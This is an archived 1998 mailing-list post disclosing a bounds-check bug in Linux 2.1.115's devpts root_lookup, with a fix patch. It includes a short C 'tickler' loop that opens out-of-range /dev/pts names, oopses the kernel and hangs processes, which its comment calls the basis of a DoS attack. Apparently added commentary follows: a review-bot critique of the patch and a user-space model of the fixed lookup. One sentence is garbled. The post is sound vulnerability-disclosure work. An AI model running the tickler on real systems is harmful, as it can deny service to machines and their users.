2.1.115 devpts contains a bug that can prevent you from unmounting file systems, and the exploit program sticks in uninterruptible sleep until you reboot. It may be possible to trash kernel data structures using the bug, with difficulty. I have yet to both ends of a pty using ptmx and devpts. I assume other versions are vulnerable too.

For purposes of demonstrating the bug assume devpts is mounted on /dev/pts. My observations suggest the following program should tickle the bug:

/* devpts bug tickler, hits 2.1.115 */
/* WARNING: This program enters uninterruptible sleep when the kernel
 * oopses, so real programmers can turn this into a process table
 * eating DoS attack. */
#include <stdio.h>	/* sprintf */
#include <fcntl.h>	/* open, O_RDWR */

int main(void)
{
	int i, fd;
	char name[256];

	i = 257;	/* start at a pty number expected to be out of range */
	while (1) {
		sprintf(name, "/dev/pts/%d", i);
		/* open(2), not fopen(3): O_RDWR is an open() flag; the lookup
		 * of the out-of-range name is what hits the bug */
		fd = open(name, O_RDWR);
		i++;
	}
}

The bug is a bounds checking failure in the root_lookup function in linux/fs/devpts/root.c. Here is a patch that fixes the bug. Given it is referencing memory it should not be viewing, and the bad data is passed back to real_lookup (which promptly oopses), more spectacular effects may be possible. The only way to use a terminal running such a program again is after rebooting, apparently due to the uninterruptible sleep the program that made the system call enters.

--- fs/devpts/root.c.dist	Thu Aug 13 17:54:17 1998
+++ fs/devpts/root.c	Thu Aug 13 17:56:54 1998
@@ -159,6 +159,8 @@
 			entry += (*p++ - '0');
 		}
 	}
+	if (entry>=sbi->max_ptys)	/* Check range of number */
+		return 0;
 	dentry->d_inode = sbi->inodes[entry];
 	if ( dentry->d_inode )
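Review bot: the added `if (entry>=sbi->max_ptys) return 0;` sits in the right place, directly before `dentry->d_inode = sbi->inodes[entry];`, but it only tests the final value; because `entry` is built up digit by digit (`entry += (*p++ - '0');`), an overlong all-digit name can wrap `entry` round to a small value that passes the test, so either cap the name length at the number of digits in max_ptys or compare `entry` against max_ptys inside the loop before the next digit is folded in. The early `return 0` also returns without assigning `dentry->d_inode` and skips the `if ( dentry->d_inode )` path that follows; confirm the caller treats that as an ordinary negative lookup rather than an error. Minor style point: `entry>=sbi->max_ptys` should be spaced like the neighbouring `if ( dentry->d_inode )`.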
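The missing range check, as an added user-space model of the numeric-name lookup (example code, neither the post's tickler nor the kernel's root.c); MAX_PTYS, the inodes[] table and the sample names are assumptions standing in for sbi->max_ptys and sbi->inodes[], and the overflow check on the accumulated number goes beyond what the patch adds:

```c
#include <limits.h>
#include <stdio.h>
#include <string.h>
#define MAX_PTYS 256   /* assumed stand-in for sbi->max_ptys */
enum { LOOKUP_BAD_NAME = -1, LOOKUP_OUT_OF_RANGE = -2 };
/* Assumed stand-in for sbi->inodes[]: slot i is "allocated" when non-zero. */
static int inodes[MAX_PTYS] = { [0] = 1, [17] = 1 };

/* Parse a pts name ("0", "17", ...): digits only, no leading zeros.  The
 * overflow test is this example's own hardening, beyond the page's hunk. */
static int parse_pts_name(const char *name, size_t len)
{
    if (len == 0) return LOOKUP_BAD_NAME;
    if (len == 1 && name[0] == '0') return 0;
    if (name[0] < '1' || name[0] > '9') return LOOKUP_BAD_NAME;
    int entry = 0;
    for (size_t i = 0; i < len; i++) {
        if (name[i] < '0' || name[i] > '9') return LOOKUP_BAD_NAME;
        int d = name[i] - '0';
        if (entry > (INT_MAX - d) / 10) return LOOKUP_BAD_NAME; /* would wrap */
        entry = entry * 10 + d;
    }
    return entry;
}

/* Patched behaviour: usable as an index only when below MAX_PTYS.  The
 * pre-patch code had no range test and indexed inodes[entry] directly,
 * so a name such as "257" read past the end of the table. */
static int pts_lookup_index(const char *name, size_t len)
{
    int entry = parse_pts_name(name, len);
    if (entry < 0) return LOOKUP_BAD_NAME;
    if (entry >= MAX_PTYS) return LOOKUP_OUT_OF_RANGE; /* the patch's check */
    return entry;
}

/* 1 if the slot is allocated, 0 for a negative lookup of any kind. */
static int pts_lookup(const char *name, size_t len)
{
    int idx = pts_lookup_index(name, len);
    return idx >= 0 ? inodes[idx] : 0;
}

int main(void)
{
    const char *s[] = { "0", "17", "3", "257", "0017", "12a", "99999999999999999999" };
    for (size_t i = 0; i < sizeof s / sizeof *s; i++)
        printf("%-22s index %3d  inode %d\n", s[i], pts_lookup_index(s[i], strlen(s[i])), pts_lookup(s[i], strlen(s[i])));
    return 0;
}
```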
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:12:33 PDT